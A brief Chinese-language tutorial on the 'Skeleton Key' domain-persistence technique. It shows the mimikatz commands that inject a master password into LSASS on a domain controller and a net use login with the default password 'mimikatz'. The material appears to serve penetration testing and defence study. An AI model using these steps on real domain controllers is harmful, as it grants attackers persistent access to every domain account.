域权限维持:Skeleton Key
参考作者:遗忘
0X01介绍
Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003到Windows Server2012 R2,能够让所有域用户使用同一个万能密码进行登录,现有的所有域用户使用原密码仍能继续登录,注意并不能更改用户权限,这里需要注意的是重启将失效。0X02步骤:
mimikatz的MISC::Skeleton
,在 DC 中注入万能钥匙(Skeleton Key) 到 LSASS 进程中。这使得所有用户所使用的万能钥匙修补DC使用"主密码” (又名万能钥匙)以及他们自己通常使用的密码进行身份验证。
1、mimikaz执行命令:privilege::debug misc::skeleton
2、mimikatz的默认Skeleton Key设置为mimikatz(坑点:使用主机名链接)
net use \\WIN-6HQC11EJBDP.yiwang.com\c$ /user:"yiwang\administrator" "mimikatz"